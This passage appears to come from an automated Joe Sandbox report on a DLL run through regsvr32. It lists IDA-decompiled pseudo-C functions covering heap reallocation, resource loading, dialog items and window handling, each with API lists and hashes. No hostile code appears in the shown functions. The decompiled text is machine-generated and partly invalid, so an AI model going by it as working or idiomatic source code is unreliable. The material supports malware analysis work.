                                                                                                            								if( *(_t67 - 0x20) == 0) {
                                                                                                            									__eflags = _t61;
                                                                                                            									if(_t61 == 0) {
                                                                                                            										_t61 = 1;
                                                                                                            										__eflags = 1;
                                                                                                            									}
                                                                                                            									_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                                                            									__eflags = _t61;
                                                                                                            									 *(_t67 + 0xc) = _t61;
                                                                                                            									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                                                            								}
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							__eflags = _t61 -  *0x10050a50; // 0x0
                                                                                                            							if(__eflags <= 0) {
                                                                                                            								_push(_t61);
                                                                                                            								_push(_t59);
                                                                                                            								_push(_t33);
                                                                                                            								_t41 = E1001409B();
                                                                                                            								_t68 = _t68 + 0xc;
                                                                                                            								__eflags = _t41;
                                                                                                            								if(_t41 == 0) {
                                                                                                            									_push(_t61);
                                                                                                            									_t42 = E1001437A();
                                                                                                            									 *(_t67 - 0x1c) = _t42;
                                                                                                            									__eflags = _t42;
                                                                                                            									if(_t42 != 0) {
                                                                                                            										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                                                            										 *(_t67 - 0x24) = _t44;
                                                                                                            										__eflags = _t44 - _t61;
                                                                                                            										if(_t44 >= _t61) {
                                                                                                            											_t44 = _t61;
                                                                                                            										}
                                                                                                            										E10011440( *(_t67 - 0x1c), _t59, _t44);
                                                                                                            										_t46 = E10013B9B(_t59);
                                                                                                            										 *(_t67 - 0x20) = _t46;
                                                                                                            										_push(_t59);
                                                                                                            										_push(_t46);
                                                                                                            										E10013BC6();
                                                                                                            										_t68 = _t68 + 0x18;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									 *(_t67 - 0x1c) = _t59;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							__eflags =  *(_t67 - 0x1c);
                                                                                                            							if( *(_t67 - 0x1c) == 0) {
                                                                                                            								__eflags = _t61;
                                                                                                            								if(_t61 == 0) {
                                                                                                            									_t61 = 1;
                                                                                                            									__eflags = 1;
                                                                                                            									 *(_t67 + 0xc) = 1;
                                                                                                            								}
                                                                                                            								_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                                                            								 *(_t67 + 0xc) = _t61;
                                                                                                            								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
                                                                                                            								 *(_t67 - 0x1c) = _t36;
                                                                                                            								__eflags = _t36;
                                                                                                            								if(_t36 != 0) {
                                                                                                            									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                                                            									 *(_t67 - 0x24) = _t38;
                                                                                                            									__eflags = _t38 - _t61;
                                                                                                            									if(_t38 >= _t61) {
                                                                                                            										_t38 = _t61;
                                                                                                            									}
                                                                                                            									E10011440( *(_t67 - 0x1c), _t59, _t38);
                                                                                                            									_push(_t59);
                                                                                                            									_push( *(_t67 - 0x20));
                                                                                                            									E10013BC6();
                                                                                                            									_t68 = _t68 + 0x14;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L21;
                                                                                                            							L27:
                                                                                                            							_t31 = E10014676(_t61);
                                                                                                            							__eflags = _t31;
                                                                                                            						} while (_t31 != 0);
                                                                                                            						goto L36;
                                                                                                            					} else {
                                                                                                            						_push(_t59);
                                                                                                            						E100107C8(0, _t59, _t61, __eflags);
                                                                                                            						L36:
                                                                                                            						_t28 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						goto L37;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t28 = E100107B6( *(_t67 + 0xc));
                                                                                                            					L37:
                                                                                                            					return E1001254F(_t28);
                                                                                                            				}
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                                                            • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				signed int _v20;
                                                                                                            				void* _t59;
                                                                                                            				signed int _t61;
                                                                                                            				signed int _t62;
                                                                                                            				void* _t64;
                                                                                                            				int* _t72;
                                                                                                            				struct HWND__* _t73;
                                                                                                            				intOrPtr _t78;
                                                                                                            				struct HRSRC__* _t81;
                                                                                                            				void* _t82;
                                                                                                            				void* _t86;
                                                                                                            				void* _t88;
                                                                                                            				void* _t89;
                                                                                                            				intOrPtr _t90;
                                                                                                            				void* _t93;
                                                                                                            				intOrPtr _t95;
                                                                                                            				intOrPtr _t101;
                                                                                                            				intOrPtr _t103;
                                                                                                            				struct HINSTANCE__* _t105;
                                                                                                            				intOrPtr* _t106;
                                                                                                            				void* _t107;
                                                                                                            
                                                                                                            				_t106 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					_t105 =  *(E100373B5() + 0xc);
                                                                                                            					_t81 = FindResourceA(_t105, _a8, 0xf0);
                                                                                                            					if(_t81 != 0) {
                                                                                                            						_t82 = LoadResource(_t105, _t81);
                                                                                                            						_v12 = _t82;
                                                                                                            						if(_t82 == 0) {
                                                                                                            							return 0;
                                                                                                            						}
                                                                                                            						_v8 = LockResource(_t82);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				__eflags = _v8;
                                                                                                            				_t86 = _a4;
                                                                                                            				_t103 = _a12;
                                                                                                            				_v16 = 1;
                                                                                                            				if(_v8 != 0) {
                                                                                                            					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
                                                                                                            					__eflags = _v12;
                                                                                                            					_v16 = _t78;
                                                                                                            					if(_v12 != 0) {
                                                                                                            						FreeResource(_v12);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t59 =  *(_t86 + 0x48);
                                                                                                            				__eflags = _t59;
                                                                                                            				if(_t59 == 0) {
                                                                                                            					L25:
                                                                                                            					return _v16;
                                                                                                            				} else {
                                                                                                            					_t88 =  *(_t59 + 0x40);
                                                                                                            					_a8 = _a8 & 0x00000000;
                                                                                                            					__eflags = _t88;
                                                                                                            					_a4 = _t88;
                                                                                                            					_v12 = _t88;
                                                                                                            					if(_t88 != 0) {
                                                                                                            						_a8 =  *(E10006D96( &_a4));
                                                                                                            					}
                                                                                                            					_t61 = 0;
                                                                                                            					__eflags =  *(_t103 + 8);
                                                                                                            					_v8 = 0;
                                                                                                            					if( *(_t103 + 8) > 0) {
                                                                                                            						do {
                                                                                                            							_t89 = _a8;
                                                                                                            							__eflags = _t89;
                                                                                                            							if(_t89 == 0) {
                                                                                                            								L17:
                                                                                                            								_t90 =  *((intOrPtr*)(_t103 + 0xc));
                                                                                                            								_t62 = _t61 << 3;
                                                                                                            								__eflags =  *(_t62 + _t90);
                                                                                                            								_v20 = _t62;
                                                                                                            								if( *(_t62 + _t90) != 0) {
                                                                                                            									_t107 = E1001F77E(0xc);
                                                                                                            									__eflags = _t107;
                                                                                                            									if(_t107 == 0) {
                                                                                                            										_t107 = 0;
                                                                                                            										__eflags = 0;
                                                                                                            									} else {
                                                                                                            										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
                                                                                                            										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
                                                                                                            										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
                                                                                                            										 *(_t107 + 8) = _t72[1];
                                                                                                            										_t103 = _a12;
                                                                                                            										 *_t107 = _t73;
                                                                                                            									}
                                                                                                            									_t93 =  *(_t86 + 0x48) + 0x3c;
                                                                                                            									__eflags = _v12;
                                                                                                            									_push(_t107);
                                                                                                            									if(__eflags == 0) {
                                                                                                            										E1001E118(_t93, __eflags);
                                                                                                            									} else {
                                                                                                            										_push(_v12);
                                                                                                            										E1001DF55(_t93);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L24;
                                                                                                            							}
                                                                                                            							_t95 =  *((intOrPtr*)(_t89 + 4));
                                                                                                            							_t101 =  *((intOrPtr*)(_t103 + 0xc));
                                                                                                            							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
                                                                                                            							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
                                                                                                            								goto L17;
                                                                                                            							} else {
                                                                                                            								_t64 = _a4;
                                                                                                            								__eflags = _t64;
                                                                                                            								_v12 = _t64;
                                                                                                            								if(_t64 == 0) {
                                                                                                            									_a8 = _a8 & 0x00000000;
                                                                                                            								} else {
                                                                                                            									_a8 =  *(E10006D96( &_a4));
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L24:
                                                                                                            							_t61 = _v8 + 1;
                                                                                                            							__eflags = _t61 -  *(_t103 + 8);
                                                                                                            							_v8 = _t61;
                                                                                                            						} while (_t61 <  *(_t103 + 8));
                                                                                                            					}
                                                                                                            					goto L25;
                                                                                                            				}
                                                                                                            			}




























                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10007209
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                                                            • GetDlgItem.USER32 ref: 100072E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeItemLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 996205394-0
                                                                                                            • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                                                            • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 88%
                                                                                                            			E10009B77(void* __ebx, void* __ecx) {
                                                                                                            				void* _t62;
                                                                                                            				long _t63;
                                                                                                            				void* _t76;
                                                                                                            
                                                                                                            				E10011BF0(0x1003ae2b, _t76);
                                                                                                            				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
                                                                                                            				if(_t62 > 0xf) {
                                                                                                            					L20:
                                                                                                            					_t63 = 0;
                                                                                                            				} else {
                                                                                                            					switch( *((intOrPtr*)(( *(_t62 + 0x10009d63) & 0x000000ff) * 4 +  &M10009D3B))) {
                                                                                                            						case 0:
                                                                                                            							__eax =  *(__ebp + 0x10);
                                                                                                            							 *__eax = 2;
                                                                                                            							 *(__eax + 8) = 1;
                                                                                                            							goto L19;
                                                                                                            						case 1:
                                                                                                            							_t65 =  *((intOrPtr*)(_t76 + 0x10));
                                                                                                            							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
                                                                                                            							 *_t65 = 0xb;
                                                                                                            							goto L19;
                                                                                                            						case 2:
                                                                                                            							__esi =  *(__ebp + 0x10);
                                                                                                            							__ecx =  *(__ebp + 8);
                                                                                                            							 *__esi = 0xb;
                                                                                                            							E1000A369( *(__ebp + 8)) =  ~__eax;
                                                                                                            							asm("sbb eax, eax");
                                                                                                            							 *(__esi + 8) = __ax;
                                                                                                            							goto L19;
                                                                                                            						case 3:
                                                                                                            							__eax =  *(__ebp + 0x10);
                                                                                                            							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
                                                                                                            							 *__eax = 0xb;
                                                                                                            							goto L19;
                                                                                                            						case 4:
                                                                                                            							__eax = E100243B2();
                                                                                                            							__edx =  *__eax;
                                                                                                            							__ecx = __eax;
                                                                                                            							__eax =  *((intOrPtr*)( *__eax + 0xc))();
                                                                                                            							 *(__ebp + 0xc) = __eax;
                                                                                                            							__ecx = __ebp + 0xc;
                                                                                                            							 *(__ebp - 4) = 1;
                                                                                                            							__eax = E10006A60(__ebp + 0xc, 0xf1c0);
                                                                                                            							__esi =  *(__ebp + 0x10);
                                                                                                            							__ecx = __ebp + 0xc;
                                                                                                            							 *__esi = 8;
                                                                                                            							__eax = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
                                                                                                            							__ecx =  *(__ebp + 0xc);
                                                                                                            							 *(__esi + 8) = __eax;
                                                                                                            							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
                                                                                                            							__eflags = __ecx;
                                                                                                            							goto L18;
                                                                                                            						case 5:
                                                                                                            							__esi =  *(__ebp + 0x10);
                                                                                                            							 *__esi = 3;
                                                                                                            							 *(__esi + 8) = GetThreadLocale();
                                                                                                            							goto L19;
                                                                                                            						case 6:
                                                                                                            							__eflags =  *(__esi + 0x58) - 0xffffffff;
                                                                                                            							if( *(__esi + 0x58) == 0xffffffff) {
                                                                                                            								_push( *(__esi + 0x1c));
                                                                                                            								__ecx = __ebp - 0x20;
                                                                                                            								E10029194(__ebp - 0x20) =  *(__esi + 0x1c);
                                                                                                            								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
                                                                                                            								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
                                                                                                            								__eax = GetTextColor( *(__ebp - 0x18));
                                                                                                            								__ecx = __ebp - 0x20;
                                                                                                            								 *(__esi + 0x5c) = __eax;
                                                                                                            								__eax = E100291EF(__ebp - 0x20, __eflags);
                                                                                                            							}
                                                                                                            							__eflags = __edi - 0xfffffd43;
                                                                                                            							__eax =  *(__ebp + 0x10);
                                                                                                            							 *__eax = 3;
                                                                                                            							if(__edi != 0xfffffd43) {
                                                                                                            								__esi =  *(__esi + 0x5c);
                                                                                                            							} else {
                                                                                                            								__esi =  *(__esi + 0x58);
                                                                                                            							}
                                                                                                            							 *(__eax + 8) = __esi;
                                                                                                            							goto L19;
                                                                                                            						case 7:
                                                                                                            							__eflags =  *(__esi + 0x60);
                                                                                                            							if( *(__esi + 0x60) != 0) {
                                                                                                            								L13:
                                                                                                            								__edi =  *(__ebp + 0x10);
                                                                                                            								 *__edi = 9;
                                                                                                            								__eax =  *(__esi + 0x60);
                                                                                                            								__ecx =  *__eax;
                                                                                                            								_push(__eax);
                                                                                                            								__eax =  *(__esi + 0x60);
                                                                                                            								 *(__edi + 8) =  *(__esi + 0x60);
                                                                                                            								goto L19;
                                                                                                            							} else {
                                                                                                            								__ecx =  *(__esi + 0x1c);
                                                                                                            								__eax = E100090C8( *(__esi + 0x1c));
                                                                                                            								__ecx = __esi;
                                                                                                            								__eax = E1000943B(__esi, __eax);
                                                                                                            								__eflags =  *(__esi + 0x60);
                                                                                                            								if( *(__esi + 0x60) == 0) {
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									goto L13;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L21;
                                                                                                            						case 8:
                                                                                                            							__eax = E100243B2();
                                                                                                            							__edx =  *__eax;
                                                                                                            							__ecx = __eax;
                                                                                                            							_t43 = __eax + 0x10; // 0x10
                                                                                                            							__esi = _t43;
                                                                                                            							 *(__ebp + 0xc) = __esi;
                                                                                                            							__edi =  *(__ebp + 0x10);
                                                                                                            							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                            							__ecx = __ebp + 0xc;
                                                                                                            							 *__edi = 8;
                                                                                                            							 *(__edi + 8) = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
                                                                                                            							_t50 = __esi - 0x10; // 0x0
                                                                                                            							__ecx = _t50;
                                                                                                            							L18:
                                                                                                            							__eax = E100014B0(__ecx, __edx);
                                                                                                            							L19:
                                                                                                            							_t63 = 1;
                                                                                                            							goto L21;
                                                                                                            						case 9:
                                                                                                            							goto L20;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L21:
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                                                                            				return _t63;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 741590120-0
                                                                                                            • Opcode ID: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction ID: 17d43df59e13e7a0fc638ef54e749073bd167348119b36b57266e85b12fc2c17
                                                                                                            • Opcode Fuzzy Hash: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction Fuzzy Hash: D451543590074ADFEB20DF64C88499EB7F0FF08354F21895AE8569B3A1E774A981CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100344F5(void* __ecx, intOrPtr _a8) {
                                                                                                            				signed int _v7;
                                                                                                            				intOrPtr _v8;
                                                                                                            				struct tagRECT _v24;
                                                                                                            				void* _t44;
                                                                                                            				void* _t48;
                                                                                                            				void* _t52;
                                                                                                            				void* _t57;
                                                                                                            				void* _t64;
                                                                                                            				signed int _t67;
                                                                                                            				void* _t75;
                                                                                                            				void* _t76;
                                                                                                            				signed int _t78;
                                                                                                            
                                                                                                            				_t75 = __ecx;
                                                                                                            				_v8 = E100202AB(__ecx);
                                                                                                            				GetWindowRect( *(__ecx + 0x1c),  &_v24);
                                                                                                            				_t67 = GetSystemMetrics(0x21);
                                                                                                            				_t78 = GetSystemMetrics(0x20);
                                                                                                            				_t76 = E1002204B(_t75);
                                                                                                            				if((_v7 & 0x00000010) == 0) {
                                                                                                            					L5:
                                                                                                            					if(_t76 < 0xa || _t76 > 0x11) {
                                                                                                            						if(_t76 != 4) {
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            						goto L8;
                                                                                                            					} else {
                                                                                                            						L8:
                                                                                                            						if((_v7 & 0x00000008) == 0) {
                                                                                                            							InflateRect( &_v24,  ~_t78,  ~_t67);
                                                                                                            							if((_v7 & 0x00000002) == 0) {
                                                                                                            								L16:
                                                                                                            								return _t76;
                                                                                                            							}
                                                                                                            							_t44 = _t76 - 4;
                                                                                                            							if(_t44 == 0) {
                                                                                                            								L21:
                                                                                                            								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                                                                                                            							}
                                                                                                            							_t48 = _t44 - 9;
                                                                                                            							if(_t48 == 0) {
                                                                                                            								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                                                                                                            							}
                                                                                                            							_t52 = _t48 - 1;
                                                                                                            							if(_t52 == 0) {
                                                                                                            								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                                                                                                            							}
                                                                                                            							_t57 = _t52;
                                                                                                            							if(_t57 == 0) {
                                                                                                            								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                                                                                                            							}
                                                                                                            							if(_t57 == 1) {
                                                                                                            								goto L21;
                                                                                                            							}
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            						_t64 = 2;
                                                                                                            						return _t64;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_t76 == 3) {
                                                                                                            					_t76 = 2;
                                                                                                            				}
                                                                                                            				if(GetKeyState(2) >= 0) {
                                                                                                            					goto L5;
                                                                                                            				} else {
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            			}
















                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetWindowRect.USER32 ref: 1003450F
                                                                                                            • GetSystemMetrics.USER32 ref: 1003451D
                                                                                                            • GetSystemMetrics.USER32 ref: 10034523
                                                                                                            • GetKeyState.USER32(00000002), ref: 10034540
                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsRectSystemWindow$InflateLongState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2406722796-0
                                                                                                            • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                                                            • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                            				void* _t31;
                                                                                                            				signed int _t42;
                                                                                                            				struct HWND__* _t62;
                                                                                                            				void* _t64;
                                                                                                            				void* _t69;
                                                                                                            
                                                                                                            				_t69 = __eflags;
                                                                                                            				E10011BF0(0x1003a5dc, _t64);
                                                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
                                                                                                            				E1001FFB4(_t64 - 0x38);
                                                                                                            				E10021613(_t64 - 0x88, _t69);
                                                                                                            				 *(_t64 - 4) = 0;
                                                                                                            				_t62 = GetTopWindow( *(__ecx + 0x1c));
                                                                                                            				if(_t62 != 0) {
                                                                                                            					do {
                                                                                                            						 *(_t64 - 0x6c) = _t62;
                                                                                                            						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
                                                                                                            						_push(_t62);
                                                                                                            						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
                                                                                                            						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
                                                                                                            							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
                                                                                                            								_t46 =  *((intOrPtr*)(_t64 + 0xc));
                                                                                                            								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                                                                                            									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
                                                                                                            										L11:
                                                                                                            										_t46 = 0;
                                                                                                            									} else {
                                                                                                            										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
                                                                                                            										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
                                                                                                            											goto L11;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t62 = GetWindow(_t62, 2);
                                                                                                            					} while (_t62 != 0);
                                                                                                            				}
                                                                                                            				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                                                                                            				 *(_t64 - 0x6c) = 0;
                                                                                                            				_t31 = E10022977(_t64 - 0x88);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                                                                                                            				return _t31;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CtrlH_prologMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4125289812-0
                                                                                                            • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                                                            • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                                                            • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                                                            • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100316E6(void* __ecx, unsigned int _a4) {
                                                                                                            				struct HWND__* _t20;
                                                                                                            				void* _t23;
                                                                                                            				void* _t33;
                                                                                                            				void* _t34;
                                                                                                            				struct HWND__* _t35;
                                                                                                            
                                                                                                            				_t34 = __ecx;
                                                                                                            				if((E100202AB(__ecx) & 0x40000000) == 0) {
                                                                                                            					_t33 = E10022AD5(__ecx);
                                                                                                            				} else {
                                                                                                            					_t33 = __ecx;
                                                                                                            				}
                                                                                                            				if((_a4 & 0x0000000c) != 0) {
                                                                                                            					_t23 = E100203CE(_t33);
                                                                                                            					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
                                                                                                            						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
                                                                                                            					} else {
                                                                                                            						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
                                                                                                            						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
                                                                                                            						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
